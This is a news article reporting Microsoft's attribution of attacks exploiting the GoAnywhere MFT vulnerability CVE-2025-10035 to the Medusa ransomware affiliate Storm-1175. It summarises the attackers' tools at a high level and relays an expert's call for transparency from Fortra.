Microsoft Links GoAnywhere MFT Exploitation to Medusa Ransomware Group
Overview of the Situation
Recent investigations by Microsoft reveal an alarming situation involving the exploitation of a critical vulnerability in Fortra’s GoAnywhere MFT file transfer platform. Identified as CVE-2025-10035, this vulnerability has been under active attack since at least September 11, 2025. The growing concern centers around a hacking group known as Medusa, specifically its affiliate, Storm-1175, which appears to be behind this ongoing campaign.
Exploit Dynamics Unveiled
Microsoft’s findings, detailed in a blog post on October 6, outline a series of tactical approaches employed by Storm-1175. The exploitation starts with the zero-day deserialization vulnerability in the GoAnywhere MFT software. Following the initial compromise, the attackers deployed remote monitoring and management (RMM) tools, specifically SimpleHelp and MeshAgent. These tools are crucial for maintaining a foothold within the compromised systems.
The attackers then executed user and system recovery commands, along with network discovery tools such as netscan, which facilitated lateral movement across networks. Microsoft confirmed the use of RMM tools to establish a command and control infrastructure, significantly expanding the attackers’ operational capabilities.
The Exfiltration Phase
During the exfiltration stage of the attack, the deployment of Rclone—a popular command-line tool—was observed in at least one compromised environment. This tool played a critical role in the data theft process. Ultimately, the attack culminated in the successful implementation of Medusa ransomware within one of the affected environments.
Expert Insights
Benjamin Harris, the CEO and founder of watchTowr, expressed deep concern about this situation, emphasizing the potential impact on organizations using GoAnywhere MFT. Harris highlighted how the confirmed exploitation of CVE-2025-10035 weeks prior has now been tied to a known Medusa affiliate.
He stated that organizations running this particular file transfer system have effectively been under silent attack for a month, with minimal communication from Fortra regarding the incident. Harris emphasized the growing need for transparency, urging Fortra to provide answers regarding how the attackers gained access to the sensitive keys necessary for exploiting the vulnerability.
Call for Transparency
With the spotlight on Fortra, many stakeholders are left wondering about the lack of information sharing. The company has not updated its advisory since its initial publication on September 18. This prolonged silence adds to the anxiety felt by affected organizations, as security professionals strive to understand the full scope of their exposure.
Harris’s calls for clearer communication illustrate a broader sentiment in the cybersecurity community: Customers need transparent updates, especially in the face of ongoing exploitation. The urgency for this information cannot be overstated; organizations must be aware of their potential vulnerabilities and adopt the necessary measures to protect themselves.
Continual Monitoring and Assessments
As this situation evolves, cybersecurity firms and professionals are maintaining heightened vigilance regarding the GoAnywhere MFT vulnerability. Microsoft’s analysis serves as a crucial reminder for organizations to conduct regular security assessments and adopt best practices surrounding file transfer protocols.
With the Medusa ransomware group’s strategies becoming clearer, entities utilizing GoAnywhere MFT must remain proactive. It’s essential for them to ensure that they have implemented comprehensive security measures to safeguard their data against evolving threats.
In summary, the situation highlights significant challenges that affect many industries reliant on file transfer systems. The connection between Microsoft, Fortra, and the Medusa ransomware group underscores the pressing need for robust cybersecurity strategies and continuous monitoring of vulnerabilities. As companies face these challenges, the call for transparency from software providers remains a critical element in fostering trust and security within the digital landscape.
